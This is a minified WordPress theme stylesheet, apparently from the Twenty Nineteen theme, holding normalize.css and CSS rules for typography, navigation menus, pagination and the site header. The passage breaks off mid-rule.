cite:lang(vi),table:lang(vi),.button:lang(vi),input:lang(vi)[type=button],input:lang(vi)[type=reset],input:lang(vi)[type=submit],.comment-navigation .nav-previous:lang(vi),.comment-navigation .nav-next:lang(vi),.comment-list .pingback .comment-body:lang(vi),.comment-list .trackback .comment-body:lang(vi),.comment-list .pingback .comment-body .comment-edit-link:lang(vi),.comment-list .trackback .comment-body .comment-edit-link:lang(vi),.comment-form .comment-notes:lang(vi),.comment-form label:lang(vi),.widget_archive ul li:lang(vi),.widget_categories ul li:lang(vi),.widget_meta ul li:lang(vi),.widget_nav_menu ul li:lang(vi),.widget_pages ul li:lang(vi),.widget_recent_comments ul li:lang(vi),.widget_recent_entries ul li:lang(vi),.widget_rss ul li:lang(vi),.widget_tag_cloud .tagcloud:lang(vi),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(vi),.entry .entry-content .wp-block-button .wp-block-button__link:lang(vi),.entry .entry-content .wp-block-archives li>a:lang(vi),.entry .entry-content .wp-block-categories li>a:lang(vi),.entry .entry-content .wp-block-latest-posts li>a:lang(vi),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(vi),.entry .entry-content .wp-block-verse:lang(vi),.entry .entry-content .has-drop-cap:lang(vi):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(vi),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(vi),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(vi),.entry .entry-content .wp-block-cover-image h2:lang(vi),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(vi),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(vi),.entry .entry-content .wp-block-cover h2:lang(vi),.entry .entry-content .wp-block-audio figcaption:lang(vi),.entry .entry-content .wp-block-video figcaption:lang(vi),.entry .entry-content .wp-block-image figcaption:lang(vi),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(vi),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(vi),.entry .entry-content .wp-block-file:lang(vi),.entry .entry-content .wp-block-file .wp-block-file__button:lang(vi),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(vi),.wp-caption-text:lang(vi),.gallery-caption:lang(vi){font-family:"Libre Franklin",sans-serif} /*! normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css */ html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{vertical-align:baseline}textarea{overflow:auto}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details{display:block}summary{display:list-item}template{display:none}[hidden]{display:none}html{font-size:22px}body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;color:#111;font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;font-size:1em;line-height:1.8;margin:0;text-rendering:optimizeLegibility}button,input,select,optgroup,textarea{color:#111;font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;line-height:1.8;text-rendering:optimizeLegibility}.author-description .author-link,.comment-metadata,.comment-reply-link,.comments-title,.comment-author .fn,.discussion-meta-info,.entry-meta,.entry-footer,.main-navigation,.no-comments,.not-found .page-title,.error-404 .page-title,.post-navigation .post-title,.page-links,.page-description,.pagination .nav-links,.sticky-post,.site-title,.site-info,#cancel-comment-reply-link,h1,h2,h3,h4,h5,h6{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}.main-navigation,.page-description,.author-description .author-link,.not-found .page-title,.error-404 .page-title,.post-navigation .post-title,.pagination .nav-links,.comments-title,.comment-author .fn,.no-comments,.site-title,h1,h2,h3,h4,h5,h6{font-weight:700;letter-spacing:-.02em;line-height:1.2;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.page-title{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif}.site-branding,.main-navigation ul.main-menu>li,.social-navigation,.author-description .author-bio,.nav-links{line-height:1.25}h1{font-size:2.25em}@media only screen and (min-width:768px){h1{font-size:2.8125em}}.entry-title,.not-found .page-title,.error-404 .page-title,.has-larger-font-size,h2{font-size:1.6875em}@media only screen and (min-width:768px){.entry-title,.not-found .page-title,.error-404 .page-title,.has-larger-font-size,h2{font-size:2.25em}}.has-regular-font-size,.has-large-font-size,.comments-title,h3{font-size:1.6875em}.site-title,.site-description,.main-navigation,.nav-links,.page-title,.page-description,.comment-author .fn,.no-comments,h2.author-title,p.author-bio,h4{font-size:1.125em}.pagination .nav-links,.comment-content,h5{font-size:.88889em}.entry-meta,.entry-footer,.discussion-meta-info,.site-info,.has-small-font-size,.comment-reply-link,.comment-metadata,.comment-notes,.sticky-post,#cancel-comment-reply-link,img:after,h6{font-size:.71111em}.site-title,.page-title{font-weight:400}.page-description,.page-links a{font-weight:700}.site-description{letter-spacing:-.01em}.post-navigation .post-title,.entry-title,.not-found .page-title,.error-404 .page-title,.comments-title,blockquote{-webkit-hyphens:auto;-moz-hyphens:auto;-ms-hyphens:auto;hyphens:auto;word-break:break-word;word-wrap:break-word}@media only screen and (min-width:768px){.entry-title{-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}}p{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}dfn,cite,em,i{font-style:italic}blockquote cite{font-size:.71111em;font-style:normal;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}pre{font-size:.88889em;font-family:"Courier 10 Pitch",Courier,monospace;line-height:1.8;overflow:auto}code,kbd,tt,var{font-size:.88889em;font-family:Menlo,monaco,Consolas,Lucida Console,monospace}abbr,acronym{border-bottom:1px dotted #666;cursor:help}mark,ins{background:#fff9c0;text-decoration:none}big{font-size:125%}a{text-decoration:none}a:hover{text-decoration:none}a:focus{text-decoration:underline}html{box-sizing:border-box}::-moz-selection{background-color:#bfdcea}::selection{background-color:#bfdcea}*,*:before,*:after{box-sizing:inherit}body{background-color:#fff}a{transition:color .11s ease-in-out;color:#0073aa}a:hover,a:active{color:#005177;outline:0;text-decoration:none}a:focus{outline:thin;outline-style:dotted;text-decoration:underline}h1,h2,h3,h4,h5,h6{clear:both;margin:1rem 0}h1:not(.site-title):before,h2:before{background:#767676;content:"\020";display:block;height:2px;margin:1rem 0;width:1em}h1:not(.site-title).has-text-align-center:before,h2.has-text-align-center:before{margin-left:auto;margin-right:auto}h1:not(.site-title).has-text-align-right:before,h2.has-text-align-right:before{margin-left:auto}hr{background-color:#767676;border:0;height:2px}ul,ol{padding-left:1rem}ul{list-style:disc}ul ul{list-style-type:circle}ol{list-style:decimal}li{line-height:1.8}li>ul,li>ol{padding-left:2rem}dt{font-weight:700}dd{margin:0 1rem 1rem}img{height:auto;max-width:100%;position:relative}figure{margin:0}blockquote{border-left:2px solid #0073aa;margin-left:0;padding:0 0 0 1rem}blockquote>p{margin:0 0 1rem}blockquote cite{color:#767676}table{margin:0 0 1rem;border-collapse:collapse;width:100%;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}table td,table th{padding:.5em;border:1px solid #767676;word-break:break-all}.button,button,input[type=button],input[type=reset],input[type=submit]{transition:background .15s ease-in-out;background:#0073aa;border:none;border-radius:5px;box-sizing:border-box;color:#fff;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:.88889em;font-weight:700;line-height:1.2;outline:none;padding:.76rem 1rem;text-decoration:none;vertical-align:bottom}.button:hover,button:hover,input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover{background:#111;cursor:pointer}.button:visited,button:visited,input[type=button]:visited,input[type=reset]:visited,input[type=submit]:visited{color:#fff;text-decoration:none}.button:focus,button:focus,input[type=button]:focus,input[type=reset]:focus,input[type=submit]:focus{background:#111;outline:thin dotted;outline-offset:-4px}input[type=text],input[type=email],input[type=url],input[type=password],input[type=search],input[type=number],input[type=tel],input[type=range],input[type=date],input[type=month],input[type=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color],textarea{-webkit-backface-visibility:hidden;background:#fff;border:solid 1px #ccc;box-sizing:border-box;outline:none;padding:.36rem .66rem;-webkit-appearance:none;outline-offset:0;border-radius:0}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,input[type=search]:focus,input[type=number]:focus,input[type=tel]:focus,input[type=range]:focus,input[type=date]:focus,input[type=month]:focus,input[type=week]:focus,input[type=time]:focus,input[type=datetime]:focus,input[type=datetime-local]:focus,input[type=color]:focus,textarea:focus{border-color:#0073aa;outline:thin solid rgba(0,115,170,.15);outline-offset:-4px}input[type=search]::-webkit-search-decoration{display:none}textarea{box-sizing:border-box;display:block;width:100%;max-width:100%;resize:vertical}form p{margin:1rem 0}a{transition:color .11s ease-in-out;color:#0073aa}a:visited{color:#0073aa}a:hover,a:active{color:#005177;outline:0;text-decoration:none}a:focus{outline:thin dotted;text-decoration:underline}.main-navigation{display:block;margin-top:.25rem}body.page .main-navigation{display:block}.main-navigation>div{display:inline}.main-navigation button{display:inline-block;border:none;padding:0;margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:700;line-height:1.2;text-decoration:none;background:0 0;color:inherit;cursor:pointer;transition:background .25s ease-in-out,transform .15s ease;-webkit-appearance:none;-moz-appearance:none}.main-navigation button:hover,.main-navigation button:focus{background:0 0}.main-navigation button:focus{outline:1px solid transparent;outline-offset:-4px}.main-navigation button:active{transform:scale(.99)}.main-navigation .main-menu{display:inline-block;margin:0;padding:0}.main-navigation .main-menu>li{color:#0073aa;display:inline;position:relative}.main-navigation .main-menu>li>a{font-weight:700;color:#0073aa;margin-right:.5rem}.main-navigation .main-menu>li>a+svg{margin-right:.5rem}.main-navigation .main-menu>li>a:hover,.main-navigation .main-menu>li>a:hover+svg{color:#005177}.main-navigation .main-menu>li.menu-item-has-children{display:inline-block;position:inherit}@media only screen and (min-width:768px){.main-navigation .main-menu>li.menu-item-has-children{position:relative}}.main-navigation .main-menu>li.menu-item-has-children>a{margin-right:.125rem}.main-navigation .main-menu>li.menu-item-has-children>a:after,.main-navigation .main-menu>li.menu-item-has-children .menu-item-has-children>a:after{content:"";display:none}.main-navigation .main-menu>li.menu-item-has-children .submenu-expand{display:inline-block;margin-right:.25rem}.main-navigation .main-menu>li.menu-item-has-children .submenu-expand.main-menu-more-toggle{position:relative;height:24px;line-height:1.2;width:24px;padding:0;margin-left:.5rem}.main-navigation .main-menu>li.menu-item-has-children .submenu-expand.main-menu-more-toggle svg{height:24px;width:24px;top:-.125rem;vertical-align:text-bottom}.wp-customizer-unloading .main-navigation .main-menu>li.menu-item-has-children .submenu-expand,.main-navigation .main-menu>li.menu-item-has-children .submenu-expand.is-empty{display:none}.main-navigation .main-menu>li.menu-item-has-children .submenu-expand svg{position:relative;top:.2rem}.main-navigation .main-menu>li:last-child>a,.main-navigation .main-menu>li:last-child.menu-item-has-children .submenu-expand{margin-right:0}.main-navigation .sub-menu{background-color:#0073aa;color:#fff;list-style:none;padding-left:0;position:absolute;opacity:0;left:-9999px;z-index:99999}@media only screen and (min-width:768px){.main-navigation .sub-menu{width:auto;min-width:-moz-max-content;min-width:-webkit-max-content;min-width:max-content}}.main-navigation .sub-menu>li{display:block;float:none;position:relative}.main-navigation .sub-menu>li.menu-item-has-children .submenu-expand{display:inline-block;position:absolute;width:calc(24px + 1rem);right:0;top:calc(.125*1rem);bottom:0;color:#fff;line-height:1;padding:calc(.5*1rem)}.main-navigation .sub-menu>li.menu-item-has-children .submenu-expand svg{top:0}.main-navigation .sub-menu>li.menu-item-has-children .submenu-expand{margin-right:0}@media only screen and (min-width:768px){.main-navigation .sub-menu>li.menu-item-has-children .menu-item-has-children>a:after{content:"\203a"}}.main-navigation .sub-menu>li>a,.main-navigation .sub-menu>li>.menu-item-link-return{color:#fff;display:block;line-height:1.2;text-shadow:none;padding:calc(.5*1rem) calc(24px + 1rem) calc(.5*1rem) 1rem;max-width:20rem}.main-navigation .sub-menu>li>a:hover,.main-navigation .sub-menu>li>a:focus,.main-navigation .sub-menu>li>.menu-item-link-return:hover,.main-navigation .sub-menu>li>.menu-item-link-return:focus{background:#005177}.main-navigation .sub-menu>li>a:hover:after,.main-navigation .sub-menu>li>a:focus:after,.main-navigation .sub-menu>li>.menu-item-link-return:hover:after,.main-navigation .sub-menu>li>.menu-item-link-return:focus:after{background:#005177}.main-navigation .sub-menu>li>.menu-item-link-return{width:100%;font-size:22px;font-weight:400;text-align:left}.main-navigation .sub-menu>li>a:empty{display:none}.main-navigation .sub-menu>li.mobile-parent-nav-menu-item{display:none;font-size:.88889em;font-weight:400}.main-navigation .sub-menu>li.mobile-parent-nav-menu-item svg{position:relative;top:.2rem;margin-right:calc(.25*1rem)}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu{display:block;left:0;margin-top:0;opacity:1;width:auto;min-width:100%}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu{display:block;left:0;margin-top:0;opacity:1;width:auto;min-width:100%}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu{display:block;margin-top:0;opacity:1;position:absolute;left:0;right:auto;top:auto;bottom:auto;height:auto;min-width:-moz-max-content;min-width:-webkit-max-content;min-width:max-content;transform:none}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu{display:block;margin-top:0;opacity:1;position:absolute;left:0;right:auto;top:auto;bottom:auto;height:auto;min-width:-moz-max-content;min-width:-webkit-max-content;min-width:max-content;transform:none}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu.hidden-links{left:0;width:100%;display:table;position:absolute}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu.hidden-links{left:0;width:100%;display:table;position:absolute}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu.hidden-links{right:0;left:auto;display:block;width:max-content}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu.hidden-links{right:0;left:auto;display:block;width:max-content}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu .submenu-expand{display:none}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu .submenu-expand{display:none}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu .sub-menu{display:block;margin-top:inherit;position:relative;width:100%;left:0;opacity:1}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu .sub-menu{display:block;margin-top:inherit;position:relative;width:100%;left:0;opacity:1}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu .sub-menu{float:none;max-width:100%}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu .sub-menu{float:none;max-width:100%}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu .sub-menu{counter-reset:submenu}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu .sub-menu{counter-reset:submenu}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas)[focus-within]>.sub-menu .sub-menu>li>a:before{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;content:"– " counters(submenu,"– ",none);counter-increment:submenu}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus-within>.sub-menu .sub-menu>li>a:before{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;content:"– " counters(submenu,"– ",none);counter-increment:submenu}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu{display:block;left:0;margin-top:0;opacity:1;width:auto;min-width:100%}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu{display:block;float:none;margin-top:0;opacity:1;position:absolute;left:0;right:auto;top:auto;bottom:auto;height:auto;min-width:-moz-max-content;min-width:-webkit-max-content;min-width:max-content;transform:none}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu.hidden-links,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu.hidden-links,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu.hidden-links{left:0;width:100%;display:table;position:absolute}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu.hidden-links,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu.hidden-links,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu.hidden-links{right:0;left:auto;display:table;width:max-content}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu .submenu-expand,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu .submenu-expand,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu .submenu-expand{display:none}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu .sub-menu{display:block;margin-top:inherit;position:relative;width:100%;left:0;opacity:1}@media only screen and (min-width:768px){.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu .sub-menu{float:none;max-width:100%}}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu .sub-menu,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu .sub-menu{counter-reset:submenu}.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):hover>.sub-menu .sub-menu>li>a:before,.main-navigation .main-menu .menu-item-has-children:not(.off-canvas):focus>.sub-menu .sub-menu>li>a:before,.main-navigation .main-menu .menu-item-has-children.is-focused:not(.off-canvas)>.sub-menu .sub-menu>li>a:before{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-weight:400;content:"– " counters(submenu,"– ",none);counter-increment:submenu}.main-navigation .main-menu>.menu-item-has-children:not(.off-canvas):hover>.sub-menu{animation:fade_in .1s forwards}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu .submenu-expand .svg-icon{transform:rotate(270deg)}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu .sub-menu{opacity:0;position:absolute;z-index:0;transform:translateX(-100%)}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu li:hover,.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu li:focus,.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu li>a:hover,.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu li>a:focus{background-color:transparent}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu>li>a,.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu>li>.menu-item-link-return{white-space:inherit}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true{display:table;margin-top:0;opacity:1;padding-left:0;left:0;top:0;right:0;bottom:0;position:fixed;z-index:100000;width:100vw;height:100vh;max-width:100vw;transform:translateX(100%);animation:slide_in_right .3s forwards}.main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true>.mobile-parent-nav-menu-item{display:block}.admin-bar .main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true{top:46px;height:calc(100vh - 46px)}.admin-bar .main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true .sub-menu.expanded-true{top:0}@media only screen and (min-width:782px){.admin-bar .main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true{top:32px;height:calc(100vh - 32px)}.admin-bar .main-navigation .main-menu .menu-item-has-children.off-canvas .sub-menu.expanded-true .sub-menu.expanded-true{top:0}}.main-navigation .main-menu-more:nth-child(n+3){display:none}@keyframes slide_in_right{100%{transform:translateX(0%)}}@keyframes fade_in{from{opacity:0}to{opacity:1}}.social-navigation{margin-top:calc(1rem/2);text-align:left}.social-navigation ul.social-links-menu{content:"";display:table;table-layout:fixed;display:inline-block;margin:0;padding:0}.social-navigation ul.social-links-menu li{display:inline-block;vertical-align:bottom;vertical-align:-webkit-baseline-middle;list-style:none}.social-navigation ul.social-links-menu li:nth-child(n+2){margin-left:.1em}.social-navigation ul.social-links-menu li a{border-bottom:1px solid transparent;display:block;color:#111;margin-bottom:-1px;transition:opacity .11s ease-in-out}.social-navigation ul.social-links-menu li a:hover,.social-navigation ul.social-links-menu li a:active{color:#111;opacity:.6}.social-navigation ul.social-links-menu li a:focus{color:#111;opacity:1;border-bottom:1px solid #111}.social-navigation ul.social-links-menu li a svg{display:block;width:32px;height:32px;transform:translateZ(0)}.social-navigation ul.social-links-menu li a svg#ui-icon-link{transform:rotate(-45deg)}@media only screen and (min-width:768px){.site-title+.social-navigation,.site-description+.social-navigation{margin-top:calc(1rem/5)}}.footer-navigation{display:inline}.footer-navigation>div{display:inline}.footer-navigation .footer-menu{display:inline;padding-left:0}.footer-navigation .footer-menu li{display:inline;margin-right:1rem}.post-navigation{margin:calc(3*1rem) 0}@media only screen and (min-width:768px){.post-navigation{margin:calc(3*1rem) calc(10% + 60px);max-width:calc(6*(100vw/12))}}@media only screen and (min-width:1168px){.post-navigation{margin:calc(3*1rem) 0;max-width:100%}}.post-navigation .nav-links{margin:0 1rem;max-width:100%;display:flex;flex-direction:column}@media only screen and (min-width:768px){.post-navigation .nav-links{margin:0}}@media only screen and (min-width:1168px){.post-navigation .nav-links{flex-direction:row;margin:0 calc(10% + 60px);max-width:calc(6*(100vw/12) - 28px)}}.post-navigation .nav-links a .meta-nav{color:#767676;user-select:none}.post-navigation .nav-links a .meta-nav:before,.post-navigation .nav-links a .meta-nav:after{display:none;content:"—";width:2em;color:#767676;height:1em}.post-navigation .nav-links a .post-title{hyphens:auto}.post-navigation .nav-links a:hover{color:#005177}@media only screen and (min-width:1168px){.post-navigation .nav-links .nav-previous,.post-navigation .nav-links .nav-next{min-width:calc(50% - 2*1rem)}}.post-navigation .nav-links .nav-previous{order:2}@media only screen and (min-width:1168px){.post-navigation .nav-links .nav-previous{order:1}}.post-navigation .nav-links .nav-previous+.nav-next{margin-bottom:1rem}.post-navigation .nav-links .nav-previous .meta-nav:before{display:inline}.post-navigation .nav-links .nav-next{order:1}@media only screen and (min-width:1168px){.post-navigation .nav-links .nav-next{order:2;padding-left:1rem}}.post-navigation .nav-links .nav-next .meta-nav:after{display:inline}.pagination .nav-links{display:flex;flex-wrap:wrap;padding:0 calc(.5*1rem)}.pagination .nav-links>*{padding:calc(.5*1rem)}.pagination .nav-links>*.dots,.pagination .nav-links>*.prev{padding-left:0}.pagination .nav-links>*.dots,.pagination .nav-links>*.next{padding-right:0}.pagination .nav-links a:focus{text-decoration:underline;outline-offset:-1px}.pagination .nav-links a:focus.prev,.pagination .nav-links a:focus.next{text-decoration:none}.pagination .nav-links a:focus.prev .nav-prev-text,.pagination .nav-links a:focus.prev .nav-next-text,.pagination .nav-links a:focus.next .nav-prev-text,.pagination .nav-links a:focus.next .nav-next-text{text-decoration:underline}.pagination .nav-links .nav-next-text,.pagination .nav-links .nav-prev-text{display:none}@media only screen and (min-width:768px){.pagination .nav-links{margin-left:calc(10% + 60px);padding:0}.pagination .nav-links .prev>*,.pagination .nav-links .next>*{display:inline-block;vertical-align:text-bottom}.pagination .nav-links>*{padding:1rem}}.comment-navigation .nav-links{display:flex;flex-direction:row}.comment-navigation .nav-previous,.comment-navigation .nav-next{min-width:50%;width:100%;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:700}.comment-navigation .nav-previous .secondary-text,.comment-navigation .nav-next .secondary-text{display:none}@media only screen and (min-width:768px){.comment-navigation .nav-previous .secondary-text,.comment-navigation .nav-next .secondary-text{display:inline}}.comment-navigation .nav-previous svg,.comment-navigation .nav-next svg{vertical-align:middle;position:relative;margin:0 -.35em;top:-1px}.comment-navigation .nav-next{text-align:right}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute !important;width:1px;word-wrap:normal !important}.screen-reader-text:focus{background-color:#f1f1f1;border-radius:3px;box-shadow:0 0 2px 2px rgba(0,0,0,.6);clip:auto !important;clip-path:none;color:#21759b;display:block;font-size:.875rem;font-weight:700;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}#content[tabindex="-1"]:focus{outline:0}.alignleft{float:left;margin-right:1rem}@media only screen and (min-width:768px){.alignleft{margin-right:calc(2*1rem)}}.alignright{float:right;margin-left:1rem}@media only screen and (min-width:768px){.alignright{margin-left:calc(2*1rem)}}.aligncenter{clear:both;display:block;margin-left:auto;margin-right:auto}.clear:before,.clear:after,.entry-content:before,.entry-content:after,.comment-content:before,.comment-content:after,.site-header:before,.site-header:after,.site-content:before,.site-content:after,.site-footer:before,.site-footer:after{content:"";display:table;table-layout:fixed}.clear:after,.entry-content:after,.comment-content:after,.site-header:after,.site-content:after,.site-footer:after{clear:both}#page{width:100%}.site-content{overflow:hidden}.site-header{padding:1em}.site-header.featured-image{display:flex;flex-direction:column;justify-content:space-between;min-height:90vh}.site-header.featured-image .site-branding-container{margin-bottom:auto}@media only screen and (min-width:768px){.site-header{margin:0;padding:3rem 0}.site-header.featured-image{min-height:100vh;margin-bottom:3rem}}.site-branding{color:#767676;-webkit-hyphens:auto;-moz-hyphens:auto;-ms-hyphens:auto;hyphens:auto;position:relative;word-wrap:break-word}@media only screen and (min-width:768px){.site-branding{margin:0 calc(10% + 60px)}}.site-logo{position:relative;z-index:999;margin-bottom:calc(.66*1rem)}@media only screen and (min-width:768px){.site-logo{margin-bottom:0;position:absolute;right:calc(100% + (1.25*1rem));top:4px;z-index:999}}.site-logo .custom-logo-link{border-radius:100%;box-sizing:content-box;box-shadow:0 0 0 0 rgba(0,0,0,0);display:block;width:50px;height:50px;overflow:hidden;transition:box-shadow .2s ease-in-out}.site-logo .custom-logo-link .custom-logo{min-height:inherit}.site-logo .custom-logo-link:hover,.site-logo .custom-logo-link:active,.site-logo .custom-logo-link:focus{box-shadow:0 0 0 2px #000}@media only screen and (min-width:768px){.site-logo .custom-logo-link{width:64px;height:64px}}.site-title{margin:auto;display:inline;color:#111}.site-title a{color:#111}.site-title a:link,.site-title a:visited{color:#111}.site-title a:hover{color:#4a4a4a}.featured-image .site-title{margin:0}@media only screen and (min-width:768px){.featured-image .site-title{display:inline-block}}.site-title+.main-navigation{display:block}@media only screen and (min-width:768px){.site-title{display:inline}}.site-title:not(:empty)+.site-description:not(:empty):before{content:"\2014";margin:0 .2em}.site-description{display:inline;color:#767676;font-weight:400;margin:0}.site-header.featured-image{overflow:hidden;position:relative;text-shadow:0 1px 2px rgba(0,0,0,.35);background-position:center;background-repeat:no-repeat;background-size:cover}.site-header.featured-image .site-branding .site-title,.site-header.featured-image .site-branding .site-description,.site-header.featured-image 